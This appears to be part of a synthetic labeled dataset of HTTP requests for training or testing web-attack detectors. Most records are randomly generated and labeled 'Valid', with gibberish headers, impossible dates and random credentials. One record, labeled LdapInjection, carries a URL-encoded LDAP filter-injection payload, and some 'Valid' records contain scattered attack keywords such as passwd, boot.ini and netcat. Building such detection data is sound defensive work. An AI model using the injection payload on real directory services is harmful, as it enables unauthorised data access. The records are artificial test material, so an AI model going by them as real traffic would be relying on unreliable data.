If-Range: "u9DIvDojYNjsQ4Wi"
Max-Forwards: 355
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic b2lpYWE6ZTE5dW1lZQ==
Authorization: ihe0s xymtda=dk075h
Range: -805
Referer: http://www.nyOt.ch/omaa.jsp
TE: trailers,trailers
Trailer: Range
User-Agent: ki7.zbk6 http://www.3hast.biz
UA-CPU: 68000
UA-Disp: 6627,5776,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 629x010
Via: HTTP/1.7 www.Toeudakt.tiff, 6.4 www.0LeN.htm
Transfer-Encoding: gzip
Upgrade: hoty3c/1.8, yho/4.8
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e1snoeprf=$%5~le2

End - Id: 7235
Start - Id: 10927
class: Valid
GET /Rthnqf/allpasswdGJG/hnlauertetifywhctE.js?ureghS8fyeemft=66804&wRteter=cfT0vnVvSeR&knkhbIdtirlaie=rd&eaaoG=ywPhjioci8asyt&yoeutf=s3telneteenodes%3F HTTP/1.1
Host: www.yEaee8e.cz
Connection: teiu
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=9797
Client-ip: 184.123.19.129
Cookie: THP@Zs-Z=konseeBHonOl
Cookie2: $Version="60"
Date: Fri, 25 Sep 09 13:01:55 GMT
ETag: "Gxu@iATnyFDiSEWq"
Expect: 100-continue
From: dmnba@sipo.net
If-Modified-Since: Wed, 01 Dec 04 16:31:01 UTC
If-Unmodified-Since: Sat, 01 Apr 06 19:50:16 UTC
If-Match: "b4bzTzWtppidHEmQV"
If-None-Match: "oX-t61FUPUK_rLqQ5"
If-Range: Sun, 15 Nov 09 07:34:49 CET
Max-Forwards: 593
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: tocs en3easx=cEno
Authorization: Digest response="Dcc6ceb5Db2fcE58549B4E81192461dC"
Range: 588592-19738,0954-52796,229852-
Referer: /rs7s/yoi0mh/ngpnh/aOtaie5n/b4Kyiu.doc
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: rWByAzQaM http://www.a0trpxhe.be
UA-CPU: PowerPC
UA-Disp: 256,243,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5309x7001
Via: 9.9 185.238.117.216:2, 7.2 www.fFodsse.jpg:5751
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 191.57.65.52
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10927
Start - Id: 7436
class: Valid
PUT /gxsZeRirnwaacreaoHb/connectkBA@PXwinntbM/httpsRZetcRTL/aguo3i0q4YRe1GHQ--J/deI6nswetiheosoets/ieV_Us4rNIc6F.N/nloGsnncdyyaaIi0bea3/e8t/hx5xG32-sm.mdb? HTTP/1.1
Content-Length: 247
Content-Language: d,aeoiqt
Content-Encoding: gzip
Content-Location: /rsmag2rr.rar
Content-MD5: amZlb3NrY2lkSG9ocm9pRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Sep 08 06:01:47 GMT
Last-Modified: Mon, 11 Jun 07 14:13:08 UTC
Host: 23.167.215.161
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.5, x-mac-ce;q=0.1, cp-932
Accept-Encoding: compress;q=0.7, compress;q=0.7, gzip;q=0.5, gzip;q=0.6
Accept-Language: bti-urrA;q=0.9, yWmas1er-noh, si9Marwc-dey;q=0.8
Cache-Control: no-store
Client-ip: 88.207.186.172
Cookie: h7Oie=64;m58ev=67343;isgRmriwhe=du)e;h6mt=314;5dhGsanlfmzaseP=s-as
Cookie2: $Version="236"
Date: Fri, 28 May 04 23:39:05 CET
ETag: "6vz7sTtTkVMjnt6z"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sun, 04 Jul 04 08:53:54 CET
If-Unmodified-Since: Thu, 19 Jul 07 21:19:40 GMT
If-Match: "c_a3XpOyvViMivE1fh"
If-None-Match: *
If-Range: *
Max-Forwards: 822
MIME-Version: 0.7
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Digest uri=/yTrEn/nzetn/drvno/sevmT/Ioeoej.mspx
Range: 0-,-49951,-3664
Referer: /osoilcaL/Tvgerr/iimoIo.cfm
TE: trailers
Trailer: Host
User-Agent: 4iispo7dsn/6.9.4.7
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 9.3 21.243.28.195
Transfer-Encoding: eNrut; eHv3o=tuceeh
Upgrade: coig/7.2, 3eo/7.1, esee/4.2, dnw/5.7
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 137.37.20.120
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

doOva=ct egSatmszo&58Flboot.inipasswd-P.4_N=37&eYd=53&dNh=tEnbody?&aae=owySy-oEWUY&lptAhn7=73511308&elietubnna=epntdrwArs=ejme&co=allrstdinw&tewerrni6e0nm=18255551&th=blDC&ejivti7=hT@7VI&yeilhto3ehQcea=5ui &gn8W=rgieaUhthhlta&org3Epgeett=u48

End - Id: 7436
Start - Id: 5523
class: Valid
POST /esdvizrehilrnTt/hL_/tjNtsOd-DU8VODBF_/0FU_Uqw416Preplace/2gDfVHDZH/ai/ecuo3a/tTIwg_7pkBtk0MuIKW1/da6bdU2C@or/ozP4OhwAS.pl? HTTP/1.0
Content-Length: 217
Content-Language: nnv,g,wetdtt
Content-Encoding: deflate
Content-Location: /icrrt9E/khri/eesi/Dso9i/68itg.png
Content-MD5: aDhuaTcxMnJ0YXhidjRvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Nov 07 12:51:54 CET
Last-Modified: Tue, 10 Feb 09 08:45:08 UTC
Host: www.erotpsae4w.st
Connection: close
Accept: application/rtf;q=0.7
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: eel5-ryt;q=0.8, gn2s-elnvoqi, t-srd
Cache-Control: max-age=452
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="6"
Date: Sat, 19 May 07 01:50:24 UTC
ETag: "ongwlaSwqsARGozg-M"
Expect: 100-continue
From: 6lhfnze@anRoaAa.it
If-Modified-Since: Sun, 20 Aug 06 19:16:11 GMT
If-Unmodified-Since: Tue, 18 May 04 18:23:04 CET
If-Match: "bk90xoaFmYnc1IYG8bT"
If-None-Match: *
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM aWY2c0hsbmFzcjUyYXJhZHRlaWV5azVydGVydEVBdGVnYXJhY2VlM3R0
Authorization: Basic TG56ODoyZ2R0ZWJl
Range: 88833-,356615-47,5006-
Referer: http://xkps.fr/9tpye/iteit0/2Ftbe.dll
TE: gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 6.8; te-6K; rv:4.6.9) Gecko/78373612
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: HTTP/8.0 250.5.176.225
Transfer-Encoding: identity
Upgrade: qh1h/1.2
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

us1aniu=bJNn8ifzqAvs&s4n3=lLYm.viED7EV&hufs4u=?-F?evar e&APHA=uhsasOamxf0te&G6Kp9=039&UGIXRdropOplike9GW=tNYc&frmlikeexecin=7&9chignUoex=068145580&sphdttTenru1eo=w8H&22otmaq=6tbe7nrodtiwle6g&kf=2dhisr&Eiom6xknn=av

End - Id: 5523
Start - Id: 15711
class: Valid
GET /S8easqet/sZ7@i_B4hrvyz56m@/1g4tpftjYP43O/7ywnk.U3I68FavR0/rpPoprUAU2Vh/dcvydra/UcDHiB_/rlbeesA4fhchyPtr2p/tHOLuY9b2dEjy/di/aW360fPuUHJ/ccaoWd1rmeytmsasotam.php3?aialsDis=8738472&5WgKQM.http=qlogr%40&hpoxiowTdxtdeh=oohm%405gijpag2+&Tliisisaiy=209998&Fiss=lkIg9g&rAlea=S%25ihSiAeiu&tolii=t%26+itchaansS&oEeslO=oeTot%5C&sdm=n&2nlsrdt=20&-s2KhjTdnph-w=o2dntr55 HTTP/1.0
Host: www.oimiHitt.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.8, windows-1257, windows-1258
Accept-Encoding: identity;q=0.3, gzip;q=0.2, gzip;q=0.1, deflate
Accept-Language: we-zrn, tefI-nritodi;q=0.5
Cache-Control: only-if-cached
Client-ip: 31.20.143.241
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="216"
Date: Tue, 08 Jun 04 17:45:58 GMT
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: jBhna@eoo43leE.com
If-Modified-Since: Sat, 10 Jun 06 02:52:08 GMT
If-Unmodified-Since: Sun, 17 Oct 04 06:23:15 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Jul 07 08:36:59 UTC
Max-Forwards: 73
MIME-Version: 7.6
Pragma: i=5av
Proxy-Authorization: NTLM ZWVvYnNqdDdpakllaDhodHN5ZWVZZUV2cnJlY3RvZWVlVHR0dHlkOGhmdGU=
Authorization: fupM ahigrje=sdnac
Range: 2-,-372
Referer: http://tiecoe.com/Xv1cl/wh7eeihj.pl
TE: gzip;q=0.1
Trailer: TE
User-Agent: iebSome8ryrheoiiufrc
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: HTTP/7.6 www.eias.jpg:506
Transfer-Encoding: deflate
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 932 www.rnd3y6t.html "sooEn8itisTrOtziidm" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 555023929683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15711
Start - Id: 33262
class: Valid
POST /6dmfs4EDHDpIf6ISw0/oPNhLxLcRr.8a4W9aVb/rp@VyI7hSuuKeu.htm? HTTP/1.1
Content-Length: 315
Content-Language: nr,Pc
Content-Encoding: gzip
Content-Location: /mawitm/u3syUIeo/geeiFhd.zip
Content-MD5: cWxzZ3RrQWFlaTdudmpvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 24:52:43 CET
Last-Modified: Sat, 22 Sep 07 08:35:28 GMT
Host: www.psaldoig.cz:80
Connection: close
Accept: video/quicktime;q=0.0, text/html;q=0.5
Accept-Charset: cp-950;q=0.7, koi8-r;q=0.4, isiri-3342, windows-1255;q=0.4
Accept-Encoding: identity;q=0.2, identity, compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.44.108.163
Cookie: oeti='3el;slat2=821mjf6Nv;tsmrte=0898990;Uulhperlrr=59
Cookie2: $Version="35"
Date: Fri, 03 Jul 09 24:32:20 UTC
ETag: W/"vj8wTgBR@25qmjKFMti"
Expect: 100-continue
From: fhleens@leny2Irsni.it
If-Modified-Since: Fri, 15 Jan 10 08:56:44 GMT
If-Unmodified-Since: Thu, 09 Oct 08 14:48:15 UTC
If-Match: "yjNHWez3rLCapcG6vhd"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: NTLM bTh0VHdzbmZlc2UxcmE4Zmdyc3Rudm1pYjNlRWxhZW90TmVTYW5zdGQ=
Range: 659776-,87434-,7-715
Referer: /4eny/ore3l/sEoiNe2/sean.rar
TE: trailers
Trailer: Proxy-Authorization
User-Agent: lvihugO8C http://www.Uluio.uk
UA-CPU: 68000
UA-Disp: 088,074,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8624x050
Via: arS/3.8 47.245.83.192
Transfer-Encoding: gzip
Upgrade: rmd/1.2, elee/2.5, nhCee/4.1
Warning: 551 21.162.127.115 "nsjirfogneooziabr" "Thu, 08 Jan 04 20:08:26 UTC"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

9ershbslnthie=fv_&eyuLaCbn9lWraea=r4sieeiee96mizEN&arWh1blel6t=hozR@TN7K&rsyw3no=hfm0&agilhe5coms=rm9nhavingtm@soeiframehe&4echo0Q=897753&lhtalzt7fqedfzs=lt7zaRbLd odelete3Er&e5s=m&xdnfapeGCeecsT=7i-hYvNW&dtur9=agTtEsbt5uia&fie=27nWinsertrosetceendog&iRaatL=e@gvSj;sti&e i8i)fnetcat[&@EZi6s=1aeeHes0oo

End - Id: 33262
Start - Id: 37981
class: LdapInjection
GET /ylwuhkensEipx7sa/my8QznyvS-./eev9klwstieine/oUR@JiF.J/s-7buTqWQ/nP0RWjjwhU-w/stilsptl6einridto/lh5yEai/z2Z.msf?5jnwe=teh&ne6ht3ibtlmXet=%29+%28+%7C++%28+cn%3D*o+++%27brien*+%29%28mail++++%3D*o+%27brien*%29+++&ctupaede=%26tMshlppsweA&44kTC=oe HTTP/1.1
Host: www.et0an.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Tue, 27 May 08 05:58:46 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 27 Aug 09 11:37:43 GMT
If-Unmodified-Since: Mon, 01 Feb 10 24:51:41 GMT
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: *
Max-Forwards: 09
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: tiver fveie=lgEt8
Range: 4893-,-7197
Referer: /flfteoe.asp
TE: trailers
Trailer: Warning
User-Agent: ortiaixet5quReaelg
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8848x2681
Via: 5.9 www.beiaelee.jpeg, 3.1 www.bncrx.html
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 189 www.a89mao.png "ueuEepsaoxoeipSs6hne" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37981
Start - Id: 1639
class: Valid
GET /8ai/cwRdye1ESoaUaTf/rLomntI9jbWhB5.asmx?tthjjcyudnao=be5etl5a&a5otPii6sl=4261&1lwrtNetsl7nh=jaareibee&ehrcc=nt_-Z&tlta6iAeq=shSX-&fdHoEfRi4ooEdn=ekcu&gdieta=72715920&bsslAogt=bys6&a9ldayeasgohpOt=16288&ehainwadataUr=1&0cnaiqotbkale=417385&6diarno=981786844&1HshutdowninputtsfCfjJ=735 HTTP/1.1
Host: 39.153.223.229:39
Connection: keep-alive
Accept: audio/x-wav;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: wd35wd6s-d, ROuse-gs;q=0.3, a-il;q=0.1
Cache-Control: no-cache
Client-ip: 170.93.21.88
Cookie: nzsamise9uf=ekzpd0cBU8
Cookie2: $Version="36"
Date: Thu, 15 Feb 07 21:02:26 CET
ETag: "tBVX.FyYsEPfvzdNa"
Expect: gattfg
From: S6tD@nser.com
If-Modified-Since: Sun, 27 Aug 06 01:10:25 GMT
If-Unmodified-Since: Thu, 07 Jan 10 10:20:25 UTC
If-Match: "6gm9UFATU3pgRzIv"
If-None-Match: *
If-Range: Thu, 21 Jul 05 24:48:14 UTC
Max-Forwards: 894
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: es3tes ibDss=nnhorbz
Authorization: Basic bnVib2dlbDplZjRl
Range: 38957-
Referer: /twrh/ctp2t/pXsx/clsqUIt.dll
TE: chunked;q=0.6
Trailer: From
User-Agent: itdi (a4t2pJ; m0MpMnnMP; tcK2nDb; yT8C81; 1cSJ-l7)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: 7.5 88.224.65.37:689, eeno/3.3 www.a3jEi.gif, 7.3 9.76.58.229
Transfer-Encoding: compress
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 860 124.167.248.34 "huupmjsHxeoOlre" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1639
Start - Id: 18631
class: Valid
GET /etp2lUzy1_VzQMJ.jpeg?positionS82=tp2%28eeltbsiakegt&aemo6xadoeUeiz=095937&anaiIdyl=mRWCwo&M4tT3=e+l4imnosr+i+%26+&msthaotnqS=egnURtmpf&SiRy=scriptoqlrcpdjjt%28e++hdse&nrte9=rqD6IQv&%u4H5I8VWt31=lpcl85eioIed7&4LG7EVQ7WA=n3MuR HTTP/1.1
Host: www.ra9MsMc.st:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip;q=0.1, compress;q=0.9, gzip;q=0.9
Accept-Language: *
Cache-Control: rs='mczjk'
Client-ip: 62.252.65.0
Cookie: seh0raykioRaaY=20453255;s0eghzsTgsi=uhtbn;se=9726441500
Cookie2: $Version="38"
Date: Sun, 21 Mar 04 05:41:40 GMT
ETag: W/"FtVc2EHXEHroTDw6OAEP"
Expect: 6Vteq
From: ddntue@tluT1lauo.gov
If-Modified-Since: Thu, 28 Jan 10 12:31:43 UTC
If-Unmodified-Since: Fri, 28 Sep 07 09:08:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 85
MIME-Version: 1.7
Pragma: d='a'
Proxy-Authorization: Digest algorithm=etukCscs
Authorization: Digest realm
Range: -0
Referer: /hjWaT/yxsyeue.aspx
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 6.3; al-eh; rv:1.0.0) Gecko/81382184
UA-CPU: 68000
UA-Disp: 7139,4412,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7882x967
Via: 9.5 www.rthhyl.shtml
Transfer-Encoding: compress
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 871 165.27.62.53 "hetiwpovou9" 
X-Forwarded-For: 76.62.187.142
X-Serial-Number: 41593026
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18631
Start - Id: 5538
class: Valid
PUT /woreplacetvnU/htpassctzpQZAd5_nullj/e60@Ifibhh/g9Ly5Qm85/0e5sh1DhtrzgswhTaosh/6it/gmwuetbbgtn/ZOkXPqWFqs4vXT/ediw8tabheiucnm/sBxO3Of3nxD0gwfQ8h.jsp? HTTP/1.1
Content-Length: 269
Content-Language: d,dohut,Nopmelh
Content-Encoding: identity
Content-Location: http://Rsdt.ch/HuTotvaa/sfibswu7.php3
Content-MD5: eVlBaWxpY21yYXNUYWVmMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 May 09 17:50:23 CET
Last-Modified: Thu, 23 Sep 04 12:26:39 UTC
Host: www.nEpvd8.com:80
Connection: mm2s
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 9oot-tnza1we, m2tFnds-r
Cache-Control: no-transform
Client-ip: 244.48.159.241
Cookie: wreWolPl=sUyNa.Fq;h2e5aova=0222
Cookie2: $Version="9"
Date: Sun, 04 Nov 07 16:50:13 UTC
ETag: W/"H8JPI40baMqM55lkNgM"
Expect: aOtsbr
From: rCwltOn@8nntmteThr.de
If-Modified-Since: Sat, 17 Mar 07 22:14:22 GMT
If-Unmodified-Since: Sat, 07 Jul 07 01:31:05 CET
If-Match: "8DmGzvyoGbR-sj3pJH"
If-None-Match: *
If-Range: Mon, 07 Mar 05 16:59:59 UTC
Max-Forwards: 081
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: Basic c3ZGcGc6aUlsb28=
Range: 6092-077254
Referer: /gtai.php
TE: chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.9 (X11; U; Solaris 5.5; tc-se; rv:1.6.6) Gecko/12609533
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9319x330
Via: 6.8 10.159.207.204, FTP/0.6 www.tzhs.gif, nppe4/5.1 www.5tdishat.shtml
Transfer-Encoding: gzip
Upgrade: eseJ/5.2, eTyY/2.2
Warning: 204 9.240.127.26:4005 "iScTwoaomtos8h9l5e" "Tue, 24 Feb 04 23:24:25 CET"
X-Forwarded-For: 176.55.228.31
X-Serial-Number: 5097796244152405039
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Tgo=hohttp&wGyboalapne=tbnR7eyo&bphycajJt=selectxbH&j.htpass850JlsA3V8=D?kbo&Oum6Yen=erht3d6hectzRe0fT&5ctoteetom1=dsam  ta@&0swhta=2480614880&rnQpBetdeipiha=sNz&es=1036&eneisvn=0706&exegships=xp_ad0d;i&tew0fl=hmfs6N2vIW&umans=tirboot.inilrimg~rcpecat|tmp\C

End - Id: 5538
Start - Id: 9609
class: Valid
GET /lG3syWj3sZ/eUNa9qnU01RiUfY6CYY/urXMw14ScMfCX4EXiU5/edqwnAcestsB/kneuUt7RseedqkrE/IvmailYdJ@J6/t1e/vtPrsl/gNG@BVnWbX4d/r5NHraP11e/6i5GAny_kxY@r8eR2G.asp?iso=i5xFJ06K&idhpuEi=%24+anstdino&DRUyF=bii33khwrrns&5i=a6sooaHams4i&eimilal=62&Ttoletcs=51079&aeeeftesdiarht=Shfn&dosr=i1sren&il=dn8hhntq26tonedbee&Hoerucbert=123124 HTTP/1.0
Host: www.yc1ia.gov
Connection: slbn0f
Accept: application/zip;q=0.1, video/mpeg, application/zip;q=0.8
Accept-Charset: euc-kr
Accept-Encoding: compress, deflate;q=0.5, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 99.251.234.215
Cookie: eaaee5nvovxdn=5713546
Cookie2: $Version="38"
Date: Tue, 09 Aug 05 05:16:50 UTC
ETag: "Z0xxwaW4lTUQ8yUbSmS"
Expect: sleebie=Xf1apd
From: eaayh@aqse.uk
If-Modified-Since: Fri, 02 Jan 09 03:35:42 UTC
If-Unmodified-Since: Sun, 27 Feb 05 03:07:18 UTC
If-Match: *
If-None-Match: "5f1wxKGVUovBRRCbAb"
If-Range: *
Max-Forwards: 93
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: iOexxu luao7=rm6admp
Authorization: Digest uri=/iedearde/Winetti/0o2rk/aAfr1u.asmx
Range: 218320-0,0-,8-66598
Referer: /Ysoe/tnPSsT/2johd/Oliecu/ytmvxdNs.sh
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: anenter/1.3.8.7
UA-CPU: StrongARM
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: R3dc
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 127.233.244.196
X-Serial-Number: 0359869
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9609
Start - Id: 11631
class: Valid
GET /treh_az/openG/4l8sgalee/Rysefe/7eeDDedq7/oi10aRsBoede1/eJ0wHGm0T.ZSF1/2fYGm6lU/hBjK/fL71r/cpwiyusiTtnrmeai.bin?kO=ony1t%5Ctte+%5CI%3Ftrc&i2a1PscriptapKlGt=432094&3DbIN79HupdateS=089887&eSeieO7ooiy=awsfeyahaUtir HTTP/1.0
Host: 204.172.186.225
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 130.128.37.7
Cookie: pedp2odmhljs=tihRt5elhoehjiZk;DK8Y=bodyngt+ysedea;YWFM=@Z$https(;rto=025911
Cookie2: $Version="9"
Date: Sat, 21 May 05 08:14:27 CET
ETag: W/"2q_cYY2SmDS7HSANGw4"
Expect: 100-continue
From: llde@xop7tnntt.de
If-Modified-Since: Mon, 12 Oct 09 20:44:42 CET
If-Unmodified-Since: Fri, 06 Feb 04 07:58:44 GMT
If-Match: "UC3IFTWehKj46QJ"
If-None-Match: *
If-Range: Sat, 24 Mar 07 10:51:50 UTC
Max-Forwards: 93
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: 9ei7eS ES58he4=8t2ih3od
Authorization: Basic YXd5aHc6ZXQydHQ=
Range: 265882-,79-,501141-
Referer: http://www.TnglIta.be/Khftea1h/otjaoojn/esrwqto/ctaoer/eoti.jpg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 2.2; m3-te; rv:3.2.5) Gecko/20629428
UA-CPU: MIPS
UA-Disp: 3478,401,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3585x2586
Via: FTP/9.7 www.cfb6tapb.png, FTP/8.5 www.s2sax.htm, hipela/4.9 38.180.161.185
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 1.197.88.127
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11631
Start - Id: 22336
class: Valid
GET /gT/7l1eus6seroCsiei.exe?thnejd=Faimg&tlyqnnetaeu3tne=4795&wtaw2i8xtneRr=33952&seotjiEeasubr=lrnbN&1rTajtigstd=7725&sk1f=Taaansr%29betweenpHigroup+byra&utosCtroiyixla6=hVIiIaHWOHpz&@BOGTl7@=00&Eh46y=gYZ71&nnyHcqtiS=295562&gshtn2vyeC=-hjzves-e&ea6LpL6services=htar&usos0er=0&umlaan92ssov=23953 HTTP/1.0
Host: www.uzEme.org:80
Connection: XbacceHE
Accept: */*
Accept-Charset: x-mac-arabic;q=0.6, iso-8859-2, windows-1252
Accept-Encoding: deflate;q=0.5
Accept-Language: Ennkeim-nhk;q=0.9, okgi-ak;q=0.1
Cache-Control: max-age=913
Client-ip: 186.185.1.249
Cookie: g4o=504
Cookie2: $Version="29"
Date: Mon, 30 Apr 07 09:58:34 UTC
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: tatnb8n=ndennoq
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Mon, 03 May 10 23:35:34 UTC
If-Unmodified-Since: Wed, 30 Jul 08 12:01:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM YTZoc25vd3RkM2lsbG9jc3c0QXNlY3NyaXFsdGVyaXVsc3R0b2V0aWI=
Authorization: Digest algorithm=owni
Range: 562648-,892394-
Referer: /r1olodiu/mgAeXama/8eee/BPtlsg4.jpeg
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.5 (X11; U; Open BSD i386 5.9; so-c0; rv:2.4.7) Gecko/12155411
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: auXnfx/3.0 213.148.48.217
Transfer-Encoding: compress
Upgrade: ujhe/8.0, pws/9.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 22336
Start - Id: 28200
class: Valid
